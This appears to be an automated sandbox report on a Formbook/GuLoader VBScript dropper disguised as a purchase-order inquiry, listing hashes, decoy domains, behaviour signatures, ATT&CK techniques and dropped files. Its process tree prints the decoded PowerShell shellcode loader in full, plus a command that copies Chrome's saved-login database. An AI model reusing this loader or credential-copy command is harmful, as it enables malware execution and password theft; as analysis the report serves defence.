Analysis

  • max time kernel
    151s
  • max time network
    144s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    21-01-2022 14:24

General

  • Target

    New _Inquiry P.O4622.vbs

  • Size

    77KB

  • MD5

    24e935f7534a81a7fd4e32daeab208a5

  • SHA1

    251ac05ebc8c963418dccddda127d2a81b5097db

  • SHA256

    5e6d8684c3f71ca6a76d22d1ddc536f302738a3027d22a5b1ce1852c9c551d99

  • SHA512

    4bd0afc25da140efadb8f49350df7dca32c781a520c85f217d77db6602e51a7731ef955b7d412f5a3edaa0c70cffe47b9b44eda88c3378052d101a1e071f4ede

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

k6sm

Decoy

mingshengjewelry.com

ontimecleaningenterprise.com

alyssa0.xyz

ptecex.xyz

dukfot.online

pvcpc.com

iowalawtechnology.com

nestletranspotation.com

mysithomes.com

greenlakespaseattle.com

evofishingsystems.com

unilytcs.com

ordemt.com

dentalbatonrouge.com

pictureme360.net

chalinaslacatalana.com

newmirrorimage.xyz

pinklaceandlemonade.com

rapinantes.com

yzicpa.com

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Formbook Payload 3 IoCs
  • Adds policy Run key to start application 2 TTPs 2 IoCs
  • Checks QEMU agent file 2 TTPs 2 IoCs

    Checks presence of QEMU agent, possibly to detect virtualization.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 35 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    PID:3024
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\New _Inquiry P.O4622.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2432
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "# L A C T I F E R O   b r e g o   K n o b e t s f r i 9   H e s t 3   G r u e s o m 4   G e n e r a l i s   A F M E J   b e a v e r   B I B L I O G R   D d m a n d s k n 5   n u l l i n   l n p o t s y s t e   T h r e a p e d a f   O u t w r e s   G T E V I V   U n s h a c k l i 8   c o r r e   L A R M E N S F   D i s t i n g v 8   d i s e m b o   H Y P E   U n f i l 9   V A N D B R N D A   G e n n e   B e m e s t r e 4   i n d p a   B i t s y l e   T e r n a s h e   K o k a r d    
  
  
 A d d - T y p e   - T y p e D e f i n i t i o n   @ "  
 u s i n g   S y s t e m ;  
 u s i n g   S y s t e m . R u n t i m e . I n t e r o p S e r v i c e s ;  
 p u b l i c   s t a t i c   c l a s s   b r n e c y k l 1  
 {  
 [ D l l I m p o r t ( " n t d l l . d l l " ) ] p u b l i c   s t a t i c   e x t e r n   i n t   N t A l l o c a t e V i r t u a l M e m o r y ( i n t   b r n e c y k l 6 , r e f   I n t 3 2   r e s t b e l b , i n t   D y b b 6 , r e f   I n t 3 2   b r n e c y k l , i n t   a p p l i e , i n t   b r n e c y k l 7 ) ;  
 [ D l l I m p o r t ( " k e r n e l 3 2 . d l l " ) ] p u b l i c   s t a t i c   e x t e r n   I n t P t r   C r e a t e F i l e A ( s t r i n g   i m m a n , u i n t   H y p o g y n y b , i n t   D i s c i p l 3 , i n t   b r n e c y k l 0 , i n t   P e t u n i e r n , i n t   G r u n g e s m i t , i n t   D e m o r a l 5 ) ;  
 [ D l l I m p o r t ( " k e r n e l 3 2 . d l l " ) ] p u b l i c   s t a t i c   e x t e r n   i n t   R e a d F i l e ( i n t   D y b b 6 0 , u i n t   D y b b 6 1 , I n t P t r   D y b b 6 2 , r e f   I n t 3 2   D y b b 6 3 , i n t   D y b b 6 4 ) ;  
 [ D l l I m p o r t ( " u s e r 3 2 . d l l " ) ] p u b l i c   s t a t i c   e x t e r n   I n t P t r   C a l l W i n d o w P r o c W ( I n t P t r   D y b b 6 5 , i n t   D y b b 6 6 , i n t   D y b b 6 7 , i n t   D y b b 6 8 , i n t   D y b b 6 9 ) ;  
 }  
 " @  
 # B i s a m s c h u   D o v e n 8   C a l y   K u l d i o x i d   g r a f i k r u t i   L k k e r n   K a n o n i 9   C h e l 9   e n d e b a l l e n   d i s k   T a d e a w o u c 4   U i t o t a n u d 8   C u t l a s s f 4   R h i p 8   T e n d e r e e o   r e i n h o l d   H j e m v i s e l u 9   H U R R S   O m n i 6   B i g g i s 5   O h m a v 4   B u c h   P e g g y p a r a   n v n i n g e d o   F O E L G E S E D    
 T e s t - P a t h   " s o u m "    
 T e s t - P a t h   " E X C L U D "    
 $ b r n e c y k l 3 = 0 ;  
 $ b r n e c y k l 9 = 1 0 4 8 5 7 6 ;  
 $ b r n e c y k l 8 = [ b r n e c y k l 1 ] : : N t A l l o c a t e V i r t u a l M e m o r y ( - 1 , [ r e f ] $ b r n e c y k l 3 , 0 , [ r e f ] $ b r n e c y k l 9 , 1 2 2 8 8 , 6 4 )  
 # S U P E R   S T O C K I L Y R   S t n k e l a 5   e m p r o s t   d e f i n i t t   S e p i a b r u 1   t o p o g r a f e r   D R Y P S T E N   F r e k v 6   D e l i b e 6   M a t i a s 3   h u s n i n g k v   H u s m   C H E E S E F L   v a a g   T h e l   S u p e r 5   s a c r i s t   V e d s t a a   B a g t u n   P r o t y l s 2   S t r y g e k v a 1   I M M O L A T   S t e d   s c r i   f e d e v a r   P e r i o d a    
 T e s t - P a t h   " s n a r e n s "    
 $ b r n e c y k l 2 = " $ e n v : t e m p "   +   " \ b l u e b . d a t "  
 # E t t i n z o m b i 4   i n t e l l e k t   M e n s u r a   f r i h a   S h u t i n g d i e   S K R V S R   S c h i n d y l 1   s y r n i n g e   A D O P T A N T   L u k k e t s b o   b l a n d i n g s f   D E C I M E R E   U d h o l d e l i   S T O C K H O   G e m i   F a b r i k a 2   i n t e r p u n   v a n d s k   s p i l d e   R E G I S T E R   P o s t g i r o k o 3   R i v e r i   O V E R E M   D A N D Y   T r a n s c 3   p o l y   M U S T A N G S   K a s e i n e t   J u g e r i n g t   B E R O L I G E D   S T R A T   A S F A L T   L o g a r i    
 $ b r n e c y k l 4 = [ b r n e c y k l 1 ] : : C r e a t e F i l e A ( $ b r n e c y k l 2 , 2 1 4 7 4 8 3 6 4 8 , 1 , 0 , 3 , 1 2 8 , 0 )  
 # C H R I S T   C E R B   H i g h j   R e k o m m a 8   C O R E C   L Y D I G H E D   A C H O L O E F   m u s l i n g   m a t e r i a l i    
 T e s t - P a t h   " S u a b l "    
 $ b r n e c y k l 5 = 0 ;  
 # S t r a a l   h y p e r   L u n e h y r d   R E I F I K   t e s t a m e   B R I K V V N   I D I O   g r a d u a t   M e a t m a n 5   c o u n t e r e v   P r e i n d e b t e 9   M y o m e r e 3   O p e r a t i v s y   p l i r b e s k a r   s a m a r   L N S A T S   c h e s k   F I G U R T Y P   P o u s s i 4   F U G T F J E   F u n k t i   O m k r s e l s 6   T o a d l   A i r w o r t h   G a s a p p a r a t   B u g s p y t t 6   P r o g r a m s t 5    
 T e s t - P a t h   " b a r a k "    
 [ b r n e c y k l 1 ] : : R e a d F i l e ( $ b r n e c y k l 4 , $ b r n e c y k l 3 , 2 6 1 1 6 , [ r e f ] $ b r n e c y k l 5 , 0 )  
 # S n a d d e n a s o 5   c i r c u   C O N F E C   p r o p o   S u i t a b l e 2   P S E U D O   I N D L G G E L   P u t r e s c e k a 8   X y l o 3   W H U F F   o a s e s k i n   T a m t a m   I m p o r 3   P r o t   T y r o   v e n t r   U N B I D A B   r a a v a r e r n e   H o r a h l u c i a   S y n t h e t   F e d t d   H a a r d 9   V I N K E L   S K A T T E A N S T   M E C H E L   R a n d i a p l   D E T O X I F I   B l n d e n    
 T e s t - P a t h   " T u r f "    
 T e s t - P a t h   " Y V E T "    
 T e s t - P a t h   " O M M A T I D I A "    
 T e s t - P a t h   " T o l u i d o c "    
 T e s t - P a t h   " K U L T U R S A M M "    
 T e s t - P a t h   " k v a l i t e t "    
 T e s t - P a t h   " S a e l g e s s t 3 "    
 T e s t - P a t h   " R a d r e n s "    
 T e s t - P a t h   " T e r n i n g t y "    
 T e s t - P a t h   " f r m n d o v e r "    
 T e s t - P a t h   " A l e v i n "    
 T e s t - P a t h   " D u m p e k a 8 "    
 T e s t - P a t h   " f a s t g r e "    
 T e s t - P a t h   " P a a t a l e r e "    
 [ b r n e c y k l 1 ] : : C a l l W i n d o w P r o c W ( $ b r n e c y k l 3 ,   0 , 0 , 0 , 0 )  
  
 "
        3⤵
        • Checks QEMU agent file
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3152
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\unctflgd\unctflgd.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1504
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES343B.tmp" "c:\Users\Admin\AppData\Local\Temp\unctflgd\CSC6DC9DE584E4C4017AEE6891C4B9843F3.TMP"
            5⤵
              PID:372
          • C:\Program Files (x86)\internet explorer\ieinstal.exe
            "C:\Program Files (x86)\internet explorer\ieinstal.exe"
            4⤵
            • Checks QEMU agent file
            • Suspicious use of NtCreateThreadExHideFromDebugger
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2684
            • C:\Windows\SysWOW64\explorer.exe
              "C:\Windows\SysWOW64\explorer.exe"
              5⤵
              • Adds policy Run key to start application
              • Adds Run key to start application
              • Suspicious use of SetThreadContext
              • Modifies Internet Explorer settings
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1756
              • C:\Windows\SysWOW64\cmd.exe
                /c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V
                6⤵
                  PID:776
                • C:\Program Files\Mozilla Firefox\Firefox.exe
                  "C:\Program Files\Mozilla Firefox\Firefox.exe"
                  6⤵
                    PID:2864

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Persistence

        Registry Run Keys / Startup Folder

        2
        T1060

        Defense Evasion

        Modify Registry

        3
        T1112

        Credential Access

        Credentials in Files

        1
        T1081

        Discovery

        Query Registry

        1
        T1012

        System Information Discovery

        2
        T1082

        Collection

        Data from Local System

        1
        T1005

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\DB1
          MD5

          b608d407fc15adea97c26936bc6f03f6

          SHA1

          953e7420801c76393902c0d6bb56148947e41571

          SHA256

          b281ce54125d4250a80f48fcc02a8eea53f2c35c3b726e2512c3d493da0013bf

          SHA512

          cc96ddf4bf90d6aaa9d86803cb2aa30cd8e9b295aee1bd5544b88aeab63dc60bb1d4641e846c9771bab51aabbfbcd984c6d3ee83b96f5b65d09c0841d464b9e4

        • C:\Users\Admin\AppData\Local\Temp\RES343B.tmp
          MD5

          b83a17043dd32888fbae48272396908a

          SHA1

          c836628f4516d73a2f726d710114f9ef36c639e0

          SHA256

          65c4a6378c3c447e5113c312190d3d82911a381afc972755eb105d8b3730d249

          SHA512

          5aa802813a6dd27f27f460f2e1b345743aae94d0603e1e4b650ccafeeae4f053dd0183f633b410b6460d85946b239db6a3f21436c93f22d0709c2dbb129357fb

        • C:\Users\Admin\AppData\Local\Temp\blueb.dat
          MD5

          48a7d9c78df69306ae414bea7c1d51de

          SHA1

          02a7398b82bbb72c6f1b5d36ace44951e9cc67e2

          SHA256

          4d8f190a415aed861321d29e69d174effbded24de4841a0f9f534161b1d5b23e

          SHA512

          9ad31cae5c95191d5e46572d554aa57dea11ded2c26f3285ada315feddccd369adc0d2b5254505bd207e8cd9b9fe21287329149fd3c3f6bd535a93223d83993f

        • C:\Users\Admin\AppData\Local\Temp\unctflgd\unctflgd.dll
          MD5

          684d4bd627378709eaee611b5430a29c

          SHA1

          d048ad6ef9dcd4ec966ccfb5bbfe3bbc1716b08e

          SHA256

          0e119e71cb2cc5b91c22994ae5e5878f079d4cba78eb965c3c43d641c1a401dc

          SHA512

          3ad53ba96ccc013a7a1ecc7d52fb4c278bfc2e38f7edf7d7f70d4cbcbfae5f8a7ece969afe1ee58849e67b43390ef7ecd94e93afd3c29c549ae592fced61951a

        • C:\Users\Admin\AppData\Roaming\7-O4R1-6\7-Ologim.jpeg
          MD5

          30e7b74d3cbb38a0fa4539b4f8bb418a

          SHA1

          729895f94cc2bedf654f021cd0b42760c34567de

          SHA256

          5b558691203738083758c561c5f969409b616a97596e32879ef75385519b729c

          SHA512

          911b8569ea341e56c7f618eba33d5e207d7a435c912de8ca8e546fe9396aae0b03e8f190063c2938bd13a5f03f65d598fb37e4745540673f7b1adbb988d2447b

        • C:\Users\Admin\AppData\Roaming\7-O4R1-6\7-Ologrf.ini
          MD5

          2f245469795b865bdd1b956c23d7893d

          SHA1

          6ad80b974d3808f5a20ea1e766c7d2f88b9e5895

          SHA256

          1662d01a2d47b875a34fc7a8cd92e78cb2ba7f34023c7fd2639cbb10b8d94361

          SHA512

          909f189846a5d2db208a5eb2e7cb3042c0f164caf437e2b1b6de608c0a70e4f3510b81b85753dbeec1e211e6a83e6ea8c96aff896e9b6e8ed42014473a54dc4f

        • C:\Users\Admin\AppData\Roaming\7-O4R1-6\7-Ologrg.ini
          MD5

          4aadf49fed30e4c9b3fe4a3dd6445ebe

          SHA1

          1e332822167c6f351b99615eada2c30a538ff037

          SHA256

          75034beb7bded9aeab5748f4592b9e1419256caec474065d43e531ec5cc21c56

          SHA512

          eb5b3908d5e7b43ba02165e092f05578f45f15a148b4c3769036aa542c23a0f7cd2bc2770cf4119a7e437de3f681d9e398511f69f66824c516d9b451bb95f945

        • C:\Users\Admin\AppData\Roaming\7-O4R1-6\7-Ologri.ini
          MD5

          d63a82e5d81e02e399090af26db0b9cb

          SHA1

          91d0014c8f54743bba141fd60c9d963f869d76c9

          SHA256

          eaece2eba6310253249603033c744dd5914089b0bb26bde6685ec9813611baae

          SHA512

          38afb05016d8f3c69d246321573997aaac8a51c34e61749a02bf5e8b2b56b94d9544d65801511044e1495906a86dc2100f2e20ff4fcbed09e01904cc780fdbad

        • C:\Users\Admin\AppData\Roaming\7-O4R1-6\7-Ologrv.ini
          MD5

          bbc41c78bae6c71e63cb544a6a284d94

          SHA1

          33f2c1d9fa0e9c99b80bc2500621e95af38b1f9a

          SHA256

          ee83c6bcea9353c74bfc0a7e739f3c4a765ace894470e09cdcdebba700b8d4cb

          SHA512

          0aea424b57adae3e14ad6491cab585f554b4dffe601b5a17bad6ee6177d2f0f995e419cde576e2d1782b9bddc0661aada11a2c9f1454ae625d9e3223635ec9f4

        • \??\c:\Users\Admin\AppData\Local\Temp\unctflgd\CSC6DC9DE584E4C4017AEE6891C4B9843F3.TMP
          MD5

          a2a22617fc0957baefd2f666fabc556d

          SHA1

          07b44496c75d4ef61c75e0b66f552e34433aadd5

          SHA256

          d998e845116e16aebf96ba5d3c448c2df2e03b7cc219e41894b4d8b3c6f18c0a

          SHA512

          01a9f5c9d94ad49ea2dbbd6234a1d5bac3023c92aa588922df258c3a8a71e0671e4ad63537bf022858381ca94ef28bec9ec06e4b5449e29b926e691e5f1457df

        • \??\c:\Users\Admin\AppData\Local\Temp\unctflgd\unctflgd.0.cs
          MD5

          26b2bf42ecc76a6f1d41418840a657a2

          SHA1

          078ef1ce837ad72087c27b59a22376d787047a96

          SHA256

          389198803dcd1407f3597e008cdc8485aca479215d8097646a339b133fcf3ad2

          SHA512

          6c45e6734ef47c372e95eb1b525e0574a056d658c6339b474a5b42e97b2710d6764ddbf70c359b7b59cfe177c4666f10e170c163a258d5ad6c7d50af9b764e43

        • \??\c:\Users\Admin\AppData\Local\Temp\unctflgd\unctflgd.cmdline
          MD5

          e77a00a673722f864bc92d3304ea9f4b

          SHA1

          039f702e7b979143a494a4ea38ffc3f2dde84e99

          SHA256

          3994166172db09428d70a98b6fb7b35779e2db43ce37f3da106495d7b4f99118

          SHA512

          e1699d579378e055bd0c1509cfcb5cbbf427e19968ca23ada1d0afe74e3161a889fad13b2a35510eae6c116bd9ac21bb6503bf248420975b64a1a9fbbccb96be

        • memory/1756-176-0x00000000045F0000-0x000000000478C000-memory.dmp
          Filesize

          1.6MB

        • memory/1756-174-0x0000000004790000-0x0000000004AB0000-memory.dmp
          Filesize

          3.1MB

        • memory/1756-173-0x0000000003040000-0x000000000306F000-memory.dmp
          Filesize

          188KB

        • memory/1756-172-0x0000000000900000-0x0000000000D3F000-memory.dmp
          Filesize

          4.2MB

        • memory/2684-167-0x000000001EBA0000-0x000000001EEC0000-memory.dmp
          Filesize

          3.1MB

        • memory/2684-159-0x0000000002E00000-0x0000000002FA0000-memory.dmp
          Filesize

          1.6MB

        • memory/2684-170-0x0000000002BA0000-0x0000000002BB5000-memory.dmp
          Filesize

          84KB

        • memory/2684-168-0x000000001E6F0000-0x000000001E705000-memory.dmp
          Filesize

          84KB

        • memory/2684-165-0x0000000000400000-0x00000000006A3000-memory.dmp
          Filesize

          2.6MB

        • memory/2684-166-0x0000000000400000-0x000000000042F000-memory.dmp
          Filesize

          188KB

        • memory/2684-164-0x00000000775A0000-0x000000007772E000-memory.dmp
          Filesize

          1.6MB

        • memory/2684-163-0x00000000775A0000-0x000000007772E000-memory.dmp
          Filesize

          1.6MB

        • memory/2684-155-0x0000000002E00000-0x0000000002F00000-memory.dmp
          Filesize

          1024KB

        • memory/2684-162-0x00007FFB70730000-0x00007FFB7090B000-memory.dmp
          Filesize

          1.9MB

        • memory/3024-169-0x0000000006510000-0x00000000066A5000-memory.dmp
          Filesize

          1.6MB

        • memory/3024-171-0x00000000066B0000-0x0000000006823000-memory.dmp
          Filesize

          1.4MB

        • memory/3024-177-0x0000000002F50000-0x0000000003036000-memory.dmp
          Filesize

          920KB

        • memory/3152-134-0x0000000009B70000-0x000000000A1E8000-memory.dmp
          Filesize

          6.5MB

        • memory/3152-158-0x00000000775A0000-0x000000007772E000-memory.dmp
          Filesize

          1.6MB

        • memory/3152-154-0x00000000775A0000-0x000000007772E000-memory.dmp
          Filesize

          1.6MB

        • memory/3152-153-0x00007FFB70730000-0x00007FFB7090B000-memory.dmp
          Filesize

          1.9MB

        • memory/3152-151-0x0000000004CB3000-0x0000000004CB4000-memory.dmp
          Filesize

          4KB

        • memory/3152-152-0x00000000094F0000-0x0000000009B68000-memory.dmp
          Filesize

          6.5MB

        • memory/3152-148-0x000000000A6F0000-0x000000000ABEE000-memory.dmp
          Filesize

          5.0MB

        • memory/3152-147-0x0000000009560000-0x0000000009582000-memory.dmp
          Filesize

          136KB

        • memory/3152-146-0x0000000009680000-0x0000000009714000-memory.dmp
          Filesize

          592KB

        • memory/3152-141-0x0000000008550000-0x0000000008558000-memory.dmp
          Filesize

          32KB

        • memory/3152-135-0x00000000094F0000-0x000000000950A000-memory.dmp
          Filesize

          104KB

        • memory/3152-117-0x0000000006D00000-0x0000000006D36000-memory.dmp
          Filesize

          216KB

        • memory/3152-127-0x0000000008490000-0x0000000008506000-memory.dmp
          Filesize

          472KB

        • memory/3152-126-0x0000000008710000-0x000000000875B000-memory.dmp
          Filesize

          300KB

        • memory/3152-125-0x0000000007D10000-0x0000000007D2C000-memory.dmp
          Filesize

          112KB

        • memory/3152-124-0x0000000007DC0000-0x0000000008110000-memory.dmp
          Filesize

          3.3MB

        • memory/3152-123-0x0000000007B40000-0x0000000007BA6000-memory.dmp
          Filesize

          408KB

        • memory/3152-122-0x0000000007AD0000-0x0000000007B36000-memory.dmp
          Filesize

          408KB

        • memory/3152-121-0x0000000007300000-0x0000000007322000-memory.dmp
          Filesize

          136KB

        • memory/3152-118-0x0000000004CB0000-0x0000000004CB1000-memory.dmp
          Filesize

          4KB

        • memory/3152-120-0x0000000004CB2000-0x0000000004CB3000-memory.dmp
          Filesize

          4KB

        • memory/3152-119-0x0000000007370000-0x0000000007998000-memory.dmp
          Filesize

          6.2MB